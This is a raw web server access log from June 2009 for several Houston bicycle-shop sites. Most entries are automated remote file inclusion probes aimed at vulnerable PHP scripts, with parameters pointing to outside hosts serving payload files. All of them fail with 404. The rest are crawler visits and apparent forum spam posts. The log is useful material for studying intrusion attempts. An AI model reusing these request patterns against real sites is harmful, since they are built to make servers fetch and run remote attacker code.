202.6.141.212 - - [09/Jun/2009:21:24:41 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.6.141.212 - - [09/Jun/2009:21:24:41 -0700] "GET /translations/Spanish.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.6.141.212 - - [09/Jun/2009:21:24:41 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.60.70.28 - - [09/Jun/2009:21:28:49 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
202.60.70.28 - - [09/Jun/2009:21:28:49 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
202.60.70.28 - - [09/Jun/2009:21:28:54 -0700] "GET /translations/Portuguese_BR.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
119.63.193.75 - - [09/Jun/2009:21:30:05 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [09/Jun/2009:21:32:06 -0700] "GET /bullitinboard/viewtopic.php?p=3184 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:21:41:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
208.80.195.34 - - [09/Jun/2009:21:43:37 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Creative ZENcast v1.02.11)" "houstonbikeshop.com"
91.121.150.170 - - [09/Jun/2009:21:50:09 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
81.196.124.252 - - [09/Jun/2009:22:05:42 -0700] "GET //skin_shop/body_default.php?GOODS[no]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.196.124.252 - - [09/Jun/2009:22:05:42 -0700] "GET /logs/access.log///skin_shop/body_default.php?GOODS[no]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.196.124.252 - - [09/Jun/2009:22:05:42 -0700] "GET /logs///skin_shop/body_default.php?GOODS[no]=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:06:17 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.11.230.36 - - [09/Jun/2009:22:06:17 -0700] "GET /translations//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.11.230.36 - - [09/Jun/2009:22:06:17 -0700] "GET /tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
72.30.142.240 - - [09/Jun/2009:22:07:12 -0700] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:07:31 -0700] "GET /translations//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:07:31 -0700] "GET /tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:07:31 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:07:34 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:07:43 -0700] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:07:43 -0700] "GET /tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:07:43 -0700] "GET /logs//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:08:17 -0700] "GET /tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:08:17 -0700] "GET /translations//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:08:17 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:08:20 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:09:21 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:09:21 -0700] "GET /translations//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:09:41 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:09:41 -0700] "GET /tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:09:41 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:09:41 -0700] "GET /translations//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.11.230.36 - - [09/Jun/2009:22:10:15 -0700] "GET /logs/access.log//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:10:15 -0700] "GET /tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:10:15 -0700] "GET /logs//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.40 - - [09/Jun/2009:22:10:36 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
66.11.230.36 - - [09/Jun/2009:22:11:15 -0700] "GET /translations//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:11:15 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:11:37 -0700] "GET /logs//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:11:37 -0700] "GET /tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:11:37 -0700] "GET /logs/access.log//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:12:24 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [09/Jun/2009:22:12:24 -0700] "GET /translations//tools/send_reminders.php?includedir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.141 - - [09/Jun/2009:22:13:12 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
122.153.28.140 - - [09/Jun/2009:22:14:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jun/2009:22:14:47 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [09/Jun/2009:22:14:47 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.61.164.39 - - [09/Jun/2009:22:18:41 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
213.149.105.23 - - [09/Jun/2009:22:19:07 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
213.149.105.23 - - [09/Jun/2009:22:19:07 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
213.149.105.23 - - [09/Jun/2009:22:19:08 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
213.149.105.23 - - [09/Jun/2009:22:19:57 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
213.149.105.23 - - [09/Jun/2009:22:20:56 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
213.149.105.23 - - [09/Jun/2009:22:24:57 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
213.149.105.23 - - [09/Jun/2009:22:24:57 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
213.149.105.23 - - [09/Jun/2009:22:24:58 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
213.149.105.23 - - [09/Jun/2009:22:24:58 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
213.149.105.23 - - [09/Jun/2009:22:25:57 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
124.115.1.7 - - [09/Jun/2009:22:27:18 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
202.60.70.28 - - [09/Jun/2009:22:36:21 -0700] "GET /translations/Spanish.txt/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.60.70.28 - - [09/Jun/2009:22:36:21 -0700] "GET /ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.60.70.28 - - [09/Jun/2009:22:36:28 -0700] "GET /translations/ws/login.php?noSet=0&includedir=http://www.amembersignup.com/signup/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
81.19.66.38 - - [09/Jun/2009:22:37:31 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jun/2009:22:37:32 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jun/2009:22:37:33 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [09/Jun/2009:22:37:34 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
58.61.164.140 - - [09/Jun/2009:22:39:34 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
124.115.1.8 - - [09/Jun/2009:22:45:50 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
58.61.164.139 - - [09/Jun/2009:22:47:42 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
213.149.105.23 - - [09/Jun/2009:22:58:32 -0700] "GET /translations/German.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
65.55.211.186 - - [09/Jun/2009:23:01:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "houstonbikeshop.com"
65.55.211.186 - - [09/Jun/2009:23:01:30 -0700] "GET /bullitinboard/viewtopic.php?p=2169 HTTP/1.1" 200 533 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "houstonbikeshop.com"
199.120.90.222 - - [09/Jun/2009:23:01:41 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.120.90.222 - - [09/Jun/2009:23:01:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
199.120.90.222 - - [09/Jun/2009:23:01:44 -0700] "GET /skin/zero_vote/error.php?dir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:05:30 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:05:30 -0700] "GET /translations/Finnish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:05:30 -0700] "GET /translations/English-US.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:05:30 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:05:31 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:05:31 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:05:31 -0700] "GET /translations/English-US.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:05:31 -0700] "GET /translations/Finnish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.149.105.23 - - [09/Jun/2009:23:05:32 -0700] "GET /translations/Dutch.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:06:13 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
209.25.195.93 - - [09/Jun/2009:23:06:13 -0700] "GET /translations/Portuguese_BR.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
209.25.195.93 - - [09/Jun/2009:23:06:13 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
91.121.150.170 - - [09/Jun/2009:23:06:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [09/Jun/2009:23:06:30 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
199.120.90.222 - - [09/Jun/2009:23:07:51 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.34.78.110 - - [09/Jun/2009:23:08:54 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.34.78.110 - - [09/Jun/2009:23:08:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.34.78.110 - - [09/Jun/2009:23:08:54 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.34.78.110 - - [09/Jun/2009:23:08:54 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.34.78.110 - - [09/Jun/2009:23:08:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.34.78.110 - - [09/Jun/2009:23:08:54 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.133.127.59 - - [09/Jun/2009:23:08:54 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.133.127.59 - - [09/Jun/2009:23:08:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.133.127.59 - - [09/Jun/2009:23:08:54 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.34.78.110 - - [09/Jun/2009:23:08:55 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.34.78.110 - - [09/Jun/2009:23:08:55 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.34.78.110 - - [09/Jun/2009:23:08:55 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
213.149.105.23 - - [09/Jun/2009:23:09:20 -0700] "GET /translations/French.txt//tools/send_reminders.php?noSet=0&includedir=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
85.10.128.219 - - [09/Jun/2009:23:09:39 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.10.128.219 - - [09/Jun/2009:23:09:39 -0700] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.10.128.219 - - [09/Jun/2009:23:09:40 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.10.128.219 - - [09/Jun/2009:23:09:40 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.10.128.219 - - [09/Jun/2009:23:09:40 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.10.128.219 - - [09/Jun/2009:23:09:40 -0700] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:44 -0700] "GET /translations/English-US.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:44 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:44 -0700] "GET /translations/Finnish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.195.93 - - [09/Jun/2009:23:11:44 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.neobts.fr/phprojekt/upload/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
